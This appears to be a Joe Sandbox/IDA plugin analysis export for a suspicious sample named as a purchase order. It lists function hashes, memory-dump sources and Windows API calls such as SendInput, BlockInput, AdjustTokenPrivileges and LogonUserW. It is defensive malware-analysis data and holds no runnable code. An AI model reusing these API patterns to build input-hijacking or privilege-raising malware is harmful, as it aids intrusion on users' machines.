Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ecf6cfc2828abf12460fa7359127f3ae001f06c3e47a01065ee166652e2fa896
Instruction ID: 38b4f1614884c6b466561351100e4d6413efc0af59102ccdb8bb2b0083ef7f16
Opcode Fuzzy Hash: ecf6cfc2828abf12460fa7359127f3ae001f06c3e47a01065ee166652e2fa896
Instruction Fuzzy Hash: 2CF0E231501229EBEB10EBA0DC88FEA736CBF08360F00416AF805D2181D7349A00CBA4

Function 0044411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00444153
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00444166

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction ID: fbbd680bab7d3c56282e5d27e33836289a13848d61ac285d335470ecaf5d92a6
Opcode Fuzzy Hash: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction Fuzzy Hash: CEF0307090434DAFEB059FA4C809BBE7FB4EF04305F04841AF96696191D779C616DFA4

Function 0043AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b9f7d5613385e1da6d55d95aebb9b8bdf3ce4966f90b2562a8f7ae14a07bf1b9
Instruction ID: d05ca891511b1101e5b1e2ebcce66da84dd88e23b38a4ffdf4c9dfd1041b73b0
Opcode Fuzzy Hash: b9f7d5613385e1da6d55d95aebb9b8bdf3ce4966f90b2562a8f7ae14a07bf1b9
Instruction Fuzzy Hash: CEE0BF71000510AFE7252F55EC05DB7B7AAEB04324B10882EB99981471D7666C95AB54

Function 004281AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00426DB3,-0000031A,?,?,00000001), ref: 004281B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004281BA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction ID: cb4d899765201692ad32a28ec14761de77d0b6c524f12578595b3ebc96636b9c
Opcode Fuzzy Hash: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction Fuzzy Hash: AEB09231445608ABDB002BA1EC09B5C7F68EB08652F004438FA0D440A18B7254109B9A

Function 0042D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction ID: 9386638fda9fd413a2794a4d8da2c2628334511d74af6c625826b4761eb94a98
Opcode Fuzzy Hash: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction Fuzzy Hash: FE323672E29F114DD7239634D922336A288AFB73D4F55D737F819B5AAAEB28C4C34104

Function 004096C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 662c84ebe0012998779ca2b2c8800ac6bb571693832b63448c70b89e26b863a0
Instruction ID: 44eb92a974ec04ae678a45c2a6fc85566987a502e803283e11ac4ed19b42c345
Opcode Fuzzy Hash: 662c84ebe0012998779ca2b2c8800ac6bb571693832b63448c70b89e26b863a0
Instruction Fuzzy Hash: E622A1716083019FD724DF15C480B9BB7E4AF84314F14892EF89AA7291DB79ED45CB8A

Function 0043038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction ID: 69bf81b66c3c26f1d0dd6c17de0175bc626120c7630bd7c8ead8038a3ade81aa
Opcode Fuzzy Hash: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction Fuzzy Hash: 2AB1E220D2AF414DD72396398831336B75CAFBB2D5FA1D72BFC1A74D62EB2185934284

Function 00AF39A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AF399E,?,?,00000008,?,?,00AF1CF4,00000000), ref: 00AF3BD0

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5deedc8b286f501e9f3f25b05d4a9da71108be7258bba73f32abcfe687d91436
Instruction ID: a7bb794b9da912d6c28dac61e7aa76ca56a1e268c11c7b821f4ce30f3afb9585
Opcode Fuzzy Hash: 5deedc8b286f501e9f3f25b05d4a9da71108be7258bba73f32abcfe687d91436
Instruction Fuzzy Hash: AAB13E721106089FDB15CF68C49AB657BE0FF45364F258698FADACF2A1C335DA92CB40

Function 0044B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0044B6DF

Part of subcall function 0042344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044BDC3,00000000,?,?,?,?,0044BF70,00000000,?), ref: 00423453
Part of subcall function 0042344A: __aulldiv.LIBCMT ref: 00423473

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction ID: 1f35ff8c92ab85e28a2e756204d048eea2d4dd3abb22b0d8cab743f592bf07ce
Opcode Fuzzy Hash: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction Fuzzy Hash: 9821A2766345108BD729CF38C881A92B7E1EB95311B248E7DE4E5CB2D0CB78B905DB98

Function 00456AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00456ACA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction ID: 4b42a4be7651b4fa624864156804a6211604a361ef3ec37b6f4db9037ef0e3f8
Opcode Fuzzy Hash: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction Fuzzy Hash: 5BE092352002046FD700EB99D40499AB7ECAFA4351B04842BF905D7291DAB4E8088B94

Function 004474E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0044750A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
Instruction ID: b1c6601c3e7c198507b9802ed8dd93b8fb3c162f29ab6dc9e599c823946f98a7
Opcode Fuzzy Hash: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
Instruction Fuzzy Hash: C6D09EA416C64579FC190B249D1BFB71608F300795FD4495B7603DD9C1AAEC6D07A03D

Function 0043B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0043AD3E), ref: 0043B124

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction ID: 9ead16adecf6f0b98c9b1c0a3e5b035ff8be85389ca5a659f0ab2e7831142da2
Opcode Fuzzy Hash: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction Fuzzy Hash: A8D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408510FA11D50A0C671D531AB50

Function 0047B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0047B352

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
Instruction ID: e7333226adad16c5055dfbbb590e28277ed762d8782b21bd7734f9a6573964fa
Opcode Fuzzy Hash: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
Instruction Fuzzy Hash: C6C04CB1801109DFCB51DFC0C9449EEB7BCAB08305F1040969105F2150D7749B459B7B

Function 00428189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042818F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction ID: d9a2277a5669354ba61d9b8df2fcfec71eca91813c8554d43367222680a44f9d
Opcode Fuzzy Hash: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction Fuzzy Hash: E4A0113000020CAB8F002B82EC088883F2CEA002A0B000030F80C000208B22A820AA8A

Function 00AEC7F0 Relevance: .9, Instructions: 853COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127a6c3db9d60b98899cdc5ea04ee0c3ac002f17975fbaa1371f04cac1f26906
Instruction ID: b3972a61e6c98cdc44aff2fda56b5a97435894f6ee6f97fc63bde65413a132cd
Opcode Fuzzy Hash: 127a6c3db9d60b98899cdc5ea04ee0c3ac002f17975fbaa1371f04cac1f26906
Instruction Fuzzy Hash: 4F822D76B083108FD748DF19D89075EF7E2ABC8314F1A893DA999E3354DA74EC118B86

Function 00C100B0 Relevance: .8, Instructions: 840COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e94864084da7dc6a0a311636128358bf8768a9b049c0509ff878851e86bc1d
Instruction ID: 3ea83085b7b7458a8ffaf32aed5b15ed110c5b3f8e0b93e4a02d71e9de294a1c
Opcode Fuzzy Hash: 93e94864084da7dc6a0a311636128358bf8768a9b049c0509ff878851e86bc1d
Instruction Fuzzy Hash: 83F1089288DBC15FD72397B04839142BFB06E6710574E8ADFC4E78A9A3E358A855D323

Function 00AF00D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab677689509235062c671ede01f910996f2e7dabdbc9dfd99f3c530d78f3e847
Instruction ID: 142903332116bee3650d6b001f93b33e5340f42ce5176e0e90a273023e695ecd
Opcode Fuzzy Hash: ab677689509235062c671ede01f910996f2e7dabdbc9dfd99f3c530d78f3e847
Instruction Fuzzy Hash: 5A32F021E29F054DD7239635C826336A299AFB73D4F15D737F81AB6EA6EF28C4834140

Function 004093F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724d9c71168ca458cb67a215e402b6cca7029dc2124992296b92838be04038cb
Instruction ID: c286300d99e2b91445e27a8d3dc9f2c346740fa195f4ecc71a48a56eb8d2d117
Opcode Fuzzy Hash: 724d9c71168ca458cb67a215e402b6cca7029dc2124992296b92838be04038cb
Instruction Fuzzy Hash: CD127170A002099BDF04DFA5DA81AEEB7F5FF48304F10852AE406F7291DB3AAD11CB59

Function 0040AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: ed8691778596391a46cab7282665a90ddbbf5c8e5447e1fbb8c1f230885cfa06
Instruction ID: 51b8f2ae0ea6a7a2cdf14863a84620939d9b69a1a68befcef78454a7017468de
Opcode Fuzzy Hash: ed8691778596391a46cab7282665a90ddbbf5c8e5447e1fbb8c1f230885cfa06
Instruction Fuzzy Hash: 5202D370A00205DBCF04DF65DA81AAEB7B5FF44304F10C07AE80AEB295EB79D955CB99

Function 004202A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 60745259864980ffaeeb8d0df3bf3fea5f6cb1ca8e1c1cebd13c90a26c2c7bac
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 32C1F6323051A30ADF2D8639943447FFAE15A917B171A036FD8B2CB6D2FF28C569D624

Function 00AB51EE Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
Instruction ID: 3e2df1470ec15f6de3fc02a1fec88fc0865cb15022bd8b9e7e66f3cf4b3ef954
Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
Instruction Fuzzy Hash: BCD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82

Function 004206D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

